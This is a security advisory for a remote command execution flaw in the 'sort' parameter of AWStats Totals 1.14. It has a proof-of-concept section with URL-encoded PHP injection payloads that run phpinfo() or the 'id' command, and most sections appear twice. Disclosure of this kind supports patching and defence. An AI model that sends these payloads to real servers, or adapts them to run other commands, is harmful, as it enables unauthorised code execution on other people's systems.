AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
BID:30856
Info
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
| Bugtraq ID: | 30856 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3922 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 26 2008 12:00AM |
| Updated: | May 26 2011 05:31AM |
| Credit: | Elliot Kendall |
| Vulnerable: |
Telartis AWStats Totals 1.14 |
| Not Vulnerable: |
Telartis AWStats Totals 1.15 |
Discussion
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
AWStats Totals is prone to a vulnerability that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects AWStats Totals 1.14 and earlier versions.
AWStats Totals is prone to a vulnerability that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
This issue affects AWStats Totals 1.14 and earlier versions.
Exploit / POC
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
The following example URIs are available. Note that these example URIs require that magic quotes be disabled, but will work on all versions of PHP.
This example will display phpinfo():
http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
This example will run the 'id' command on the target system:
http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
The following example URIs require a version of PHP that parses function calls inside strings (5+, some versions of 4?), but will work if magic quotes are enabled.
This example will display phpinfo():
http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
This example will run the 'id' command on the target system:
http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
The following exploit code is available:
The following example URIs are available. Note that these example URIs require that magic quotes be disabled, but will work on all versions of PHP.
This example will display phpinfo():
http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
This example will run the 'id' command on the target system:
http://www.example.com/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
The following example URIs require a version of PHP that parses function calls inside strings (5+, some versions of 4?), but will work if magic quotes are enabled.
This example will display phpinfo():
http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
This example will run the 'id' command on the target system:
http://www.example.com/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
The following exploit code is available:
Solution / Fix
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
Solution:
Vendor fixes are available; please see the references for more information.
Solution:
Vendor fixes are available; please see the references for more information.
References
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities
References:
References:
- AWStats Totals Homepage (Telartis)
- Elliot Kendall